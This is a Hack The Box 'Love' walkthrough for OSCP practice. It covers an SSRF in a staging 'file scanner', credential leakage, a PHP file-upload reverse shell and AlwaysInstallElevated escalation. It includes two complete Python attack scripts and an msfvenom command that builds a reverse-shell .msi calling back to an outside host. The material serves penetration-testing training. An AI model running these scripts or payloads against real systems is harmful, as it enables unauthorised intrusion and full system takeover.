TJ_Null’s OSCP Prep – HTB – Love
This Windows machine has an SSRF vulnerability in a “file scanner” hosted on a staging subdomain. Through the SSRF I reach a service bound to localhost that leaks credentials for the voting-system admin panel on the main site. That panel has an authenticated file-upload RCE (a candidate's photo is saved under /images with its original name and no type check), which I abuse to get a reverse shell as the user Phoebe. The AlwaysInstallElevated policy is set in the registry, so any .msi that user installs runs as NT AUTHORITY\SYSTEM, giving us administrator access.
I’ll start with an Nmap scan of all TCP ports, then a second full run with default scripts and version detection.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# nmap -p- --min-rate 10000 10.10.10.239 -oN nmap.port
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:09 EST
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.069s latency).
Not shown: 65461 closed tcp ports (reset), 55 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nmap.result
# Nmap 7.92 scan initiated Sun Jan 23 16:05:38 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.031s latency).
Not shown: 65015 closed tcp ports (reset), 501 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-01-23T21:32:16+00:00; +23m28s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-23T13:32:03-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h23m28s, deviation: 4h00m01s, median: 23m27s
| smb2-time:
| date: 2022-01-23T21:32:06
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 16:08:49 2022 -- 1 IP address (1 host up) scanned in 191.40 seconds
I’ll note a couple of things before moving forward.
- The domain is love.htb (from the Service Info hostnames).
- The TLS certificate on 443 names a subdomain, staging.love.htb; both names go into /etc/hosts.
- Apache answers on 80, 443 and 5000. 443 and 5000 return 403 Forbidden when requested by IP, so they probably expect a particular vhost or a local client.
love.htb
It requires a Voter’s ID, which I don’t have.
staging.love.htb
There is a “Free File Scanner” running on staging.love.htb/beta.php that fetches whatever URL you give it. A server that fetches attacker-supplied URLs is a classic SSRF candidate: we could make it read resources, such as services bound to localhost, that we are not allowed to reach directly.
https://love.htb
Visiting https://love.htb gives us a 403 Forbidden error.
Before moving forward I like to run a nikto scan against the webserver.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nikto.result
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.239
+ Target Hostname: 10.10.10.239
+ Target Port: 80
+ Start Time: 2022-01-23 16:12:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-01-23 16:18:57 (GMT-5) (414 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
There is a subdirectory called /admin (the voting system’s admin login), and directory indexing is enabled on /images and /includes, which will be useful later for confirming an upload landed.
Initial Access – SSRF
SSRF (server-side request forgery) is when an attacker makes the webserver issue a request to a destination of the attacker’s choosing. Because the request originates from the server, it reaches anything the server can reach, including services listening only on loopback. Here the interesting destinations are the ports that answered 403 Forbidden from outside. After some enumeration I found that asking the scanner to fetch http://127.0.0.1:5000 returns the page that is forbidden to us directly, and it contains credentials for the voting system’s admin panel we found earlier.
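As an added example (not code from the original write-up), the script below automates that enumeration: it parses the open ports from the nmap output above, asks the scanner to fetch each one on loopback, and prints only what differs from a baseline request to a closed port, so the scanner’s own page chrome cannot bury a small hit. The form field names (`file`, `read`), the baseline port and the host entry for staging.love.htb are assumptions to verify against beta.php’s HTML and your /etc/hosts.

```python
#!/usr/bin/env python3
"""SSRF sweep through the staging "file scanner" (added example, stdlib only).

Assumed, not taken from the write-up: beta.php reads the URL from a POST
field named "file" with a submit field "read"; both are constants below so
they are easy to correct from the form's HTML. staging.love.htb must resolve
(an /etc/hosts entry). Nothing is sent over the network unless the script is
run with an nmap output file as its argument.
"""
import re
import sys
from typing import Dict, List
from urllib import error, parse, request

SCANNER = "http://staging.love.htb/beta.php"   # page named in the write-up
FIELD, SUBMIT = "file", "read"                  # assumed form field names

# Constructed excerpt in the format of the write-up's nmap -oN output.
SAMPLE_NMAP = """\
PORT      STATE SERVICE
80/tcp    open  http
443/tcp   open  https
3306/tcp  open  mysql
5000/tcp  open  upnp
5985/tcp  open  wsman
49664/tcp open  unknown
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b", re.M)


def parse_open_ports(nmap_text: str) -> List[int]:
    """TCP ports nmap reported open, in scan order."""
    return [int(p) for p in PORT_RE.findall(nmap_text)]


def build_targets(ports, hosts=("127.0.0.1", "localhost")) -> List[str]:
    """URLs to request *through* the scanner. Two spellings of loopback are
    tried because deny-lists frequently block only one of them."""
    return [f"http://{h}:{p}/" for h in hosts for p in ports]


def fetch_via_ssrf(url: str, timeout: float = 10) -> str:
    """Ask the scanner to fetch `url` and return whatever it echoes back."""
    data = parse.urlencode({FIELD: url, SUBMIT: ""}).encode()
    with request.urlopen(request.Request(SCANNER, data=data), timeout=timeout) as r:
        return r.read().decode("utf-8", "replace")


def diff_against_baseline(baseline: str, body: str) -> str:
    """The scanner wraps every result in its own page chrome; keep only the
    non-blank lines that were not present in a baseline fetch of a closed port."""
    base = set(baseline.splitlines())
    return "\n".join(l for l in body.splitlines() if l.strip() and l not in base)


def sweep(ports, baseline_port: int = 1) -> Dict[str, str]:
    """Map each internal URL to the new content it produced, skipping silent ones."""
    baseline = fetch_via_ssrf(f"http://127.0.0.1:{baseline_port}/")
    hits: Dict[str, str] = {}
    for url in build_targets(ports):
        try:
            new = diff_against_baseline(baseline, fetch_via_ssrf(url))
        except (error.URLError, OSError) as e:
            new = f"error: {e}"
        if new:
            hits[url] = new
    return hits


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} nmap.port   # the -oN file from the port scan")
    with open(sys.argv[1]) as f:
        open_ports = parse_open_ports(f.read())
    for url, new in sweep(open_ports).items():
        print(f"=== {url}\n{new[:800]}\n")
```

Run it as `python3 ssrf_sweep.py nmap.port`. On this box port 5000 is the one that stands out; when a plain loopback address is rejected, the same sweep is worth repeating with `https://` targets and other spellings of localhost.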
After logging in with those credentials at /admin, we are presented with the admin panel.
Shell as Phoebe
Using searchsploit we find that this voting system has an authenticated file-upload remote code execution vulnerability.
Looking at the explanation for this RCE, we have to add a candidate, and the photo field accepts an arbitrary file: the upload is stored under its original name without any check on the extension or content, so a .php file is saved and served as a script.
A candidate must belong to a position, so first we have to create a position.
Then I’ll add a candidate and upload a PHP reverse shell as its photo.
Visiting /images (directory indexing is on) we can see that the payload is uploaded. I’ll start a netcat listener and then request the file to open the shell.
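As an added example, not the searchsploit exploit and not the write-up’s own steps, here is the whole chain in one script: log in, make sure a position exists, add a candidate whose “photo” is a PHP file, confirm it in the /images/ directory index, and request it once the listener is up. The endpoint paths and form field names in the docstring are assumptions about the admin pages’ forms and must be checked against their HTML; the PHP reverse shell itself is supplied by you.

```python
#!/usr/bin/env python3
"""Authenticated upload RCE in the voting system's admin panel (added example,
stdlib only; not the exploit from searchsploit or the write-up).

Assumed form fields, to be verified against the admin pages' HTML:
  /admin/login.php           POST username, password, login
  /admin/positions_add.php   POST description, max_vote, add
  /admin/candidates.php      GET; its add-candidate form holds <select name="position">
  /admin/candidates_add.php  POST firstname, lastname, position, platform, add
                             + multipart file field "photo"
The photo lands in /images/ under its original name with no extension check,
which is what turns a .php upload into code execution. Nothing is sent unless
the script is run with arguments.
"""
import http.cookiejar
import re
import sys
import uuid
from typing import Dict, Optional, Tuple
from urllib import parse, request

BASE = "http://love.htb"


def multipart(fields: Dict[str, str], file_field: str, filename: str,
              content: bytes, ctype: str = "image/png") -> Tuple[bytes, str]:
    """Hand-built multipart/form-data body (urllib has no helper). The declared
    Content-Type is cosmetic here: the server never looks at it."""
    boundary = uuid.uuid4().hex
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
                 f'filename="{filename}"\r\nContent-Type: {ctype}\r\n\r\n')
    body = "".join(parts).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def candidate_form(position_id: str, label: str = "rev") -> Dict[str, str]:
    """The non-file fields of the add-candidate form (assumed names)."""
    return {"firstname": label, "lastname": label, "position": position_id,
            "platform": label, "add": ""}


def first_position_id(candidates_html: str) -> Optional[str]:
    """Pick the first numeric position offered by the add-candidate <select>."""
    m = re.search(r'<select[^>]*name="position".*?<option[^>]*value="(\d+)"',
                  candidates_html, re.S)
    return m.group(1) if m else None


def find_in_listing(index_html: str, filename: str) -> bool:
    """True if the Apache directory index of /images/ links to our upload."""
    return re.search(r'href="%s"' % re.escape(filename), index_html) is not None


class Admin:
    """Minimal cookie-aware client for the admin panel."""

    def __init__(self, base: str = BASE):
        self.base = base
        self.opener = request.build_opener(
            request.HTTPCookieProcessor(http.cookiejar.CookieJar()))

    def get(self, path: str) -> str:
        with self.opener.open(self.base + path, timeout=15) as r:
            return r.read().decode("utf-8", "replace")

    def post(self, path: str, data, content_type: Optional[str] = None) -> str:
        if content_type is None:  # plain form post
            data = parse.urlencode(data).encode()
            content_type = "application/x-www-form-urlencoded"
        req = request.Request(self.base + path, data=data,
                              headers={"Content-Type": content_type})
        with self.opener.open(req, timeout=15) as r:
            return r.read().decode("utf-8", "replace")

    def upload_shell(self, php_bytes: bytes) -> str:
        """Create a position if none exists, add a candidate whose photo is our
        PHP file, and return the name it should now have under /images/."""
        pos = first_position_id(self.get("/admin/candidates.php"))
        if pos is None:
            self.post("/admin/positions_add.php",
                      {"description": "rev", "max_vote": "1", "add": ""})
            pos = first_position_id(self.get("/admin/candidates.php")) or "1"
        name = f"{uuid.uuid4().hex[:8]}.php"  # random name: no collisions, no guessing
        body, ct = multipart(candidate_form(pos), "photo", name, php_bytes)
        self.post("/admin/candidates_add.php", body, ct)
        return name


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} admin_user admin_pass shell.php  (start the listener first)")
    user, pw, shell = sys.argv[1:]
    admin = Admin()
    admin.post("/admin/login.php", {"username": user, "password": pw, "login": ""})
    with open(shell, "rb") as f:
        name = admin.upload_shell(f.read())
    if not find_in_listing(admin.get("/images/"), name):
        sys.exit("upload not visible in /images/; check the assumed field names")
    print(f"triggering {BASE}/images/{name}")
    try:
        admin.get(f"/images/{name}")  # blocks for as long as the reverse shell lives
    except OSError:
        pass
```

The random filename matters beyond tidiness: anyone who can read the /images/ index can also execute a web shell left there, so pick names that are not guessable and delete the file when done.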
Shell as NT AUTHORITY\SYSTEM
I’ll use Carlos Polop’s winPEAS.exe (from PEASS-ng) to enumerate possible privilege escalation vectors.
I notice two lines in the scan: the AlwaysInstallElevated value under Software\Policies\Microsoft\Windows\Installer is set to 1 in both HKLM and HKCU.
The HackTricks page on AlwaysInstallElevated explains the consequence: with both values set, Windows Installer runs any .msi the user installs with SYSTEM privileges, so a malicious package is a direct privilege escalation. Both values must be 1; HKLM alone is a common false positive.
Great, so I’ll create a .msi payload with msfvenom that launches a reverse shell, and upload it to the machine.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=5555 -f msi -o rev.msi
After uploading it to the machine, I’ll start another netcat listener on port 5555 first, then install the package with msiexec using the /quiet /qn /i switches so it runs without any UI. The shell that connects back is NT AUTHORITY\SYSTEM.
What I’ve learned
- If there is a possible SSRF vulnerability, try making requests to internal resources (loopback, and any ports that are filtered or 403 from outside) to see if there is anything interesting.
- Enumerating the registry can give a hint at possible privesc vectors. In this instance the AlwaysInstallElevated policy let Phoebe install .msi files as NT AUTHORITY\SYSTEM.
- Not every reverse shell will work right away. I had to try a couple of times to get the PHP reverse shell to give me a stable connection.